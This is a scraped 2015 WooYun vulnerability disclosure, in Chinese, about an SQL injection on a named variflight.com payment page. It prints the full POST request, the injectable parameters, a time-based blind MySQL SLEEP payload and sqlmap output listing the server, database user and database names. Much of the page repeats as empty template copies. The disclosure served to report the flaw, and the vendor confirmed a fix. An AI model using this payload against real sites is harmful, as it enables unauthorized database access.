飞友科技某重要站点SQL注射 | wooyun-2015-0125319| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0125319

漏洞标题：飞友科技某重要站点SQL注射

漏洞作者：路人甲

提交时间：2015-07-08 11:03

修复时间：2015-08-22 13:40

公开时间：2015-08-22 13:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-08：细节已通知厂商并且等待厂商处理中
2015-07-08：厂商已经确认，细节仅向厂商公开
2015-07-18：细节向核心白帽子及相关领域专家公开
2015-07-28：细节向普通白帽子公开
2015-08-07：细节向实习白帽子公开
2015-08-22：细节向公众公开

简要描述：

详细说明：

登陆以后自动跳转到个人中心，co-biz.variflight.com
POST /product/js_asp_gb/alipayto.asp HTTP/1.1
Content-Length: 320
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: co-biz.variflight.com/product/
Cookie: 
Host: co-biz.variflight.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
productcode=pF21ib5cnp&Submit2=%a8%a8%a3%a4%3f%a1%ec%3f%3f%a1%c0%7c3%3f%3f%a1%e8%3f%3f%3f%3f&v_amount=e&v_moneytype=1&v_oid=20526500201507070062&v_rcvaddr=e&v_rcvname=1&v_rcvtel=e&v_ymd=e
参数productcode和v_rcvname(直接sqlmap这个参数是跑不出来的),
还有，在访问某些页面的时候，productcode这个参数在cookie里面，但是不管在哪，都存在注入。

漏洞证明：

---
Parameter: productcode (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
    Payload: productcode=pF21ib5cnp' OR (SELECT * FROM (SELECT(SLEEP(5)))ddzE) AND 'DWif'='DWif&Submit2=%a8%a8%a3%a4?%a1%ec??%a1%c0|3??%a1%e8????&v_amount=e&v_moneytype=1&v_oid=20526500201507070062&v_rcvaddr=e&v_rcvname=1&v_rcvtel=e&v_ymd=e
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0.12
current user:    '[email protected].%'
current user is DBA:    False
available databases [3]:
[*] information_schema
[*] test
[*] var

修复方案：

修复！

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-07-08 13:39

厂商回复：

已经对问题进行修复，感谢白帽子的努力，还请大家多多对我们进行测试。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0125319

漏洞标题：飞友科技某重要站点SQL注射

相关厂商：variflight.com

漏洞作者：路人甲

提交时间：2015-07-08 11:03

修复时间：2015-08-22 13:40

公开时间：2015-08-22 13:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0125319

漏洞标题：飞友科技某重要站点SQL注射

相关厂商：variflight.com

漏洞作者： 路人甲

提交时间：2015-07-08 11:03

修复时间：2015-08-22 13:40

公开时间：2015-08-22 13:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0125319"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云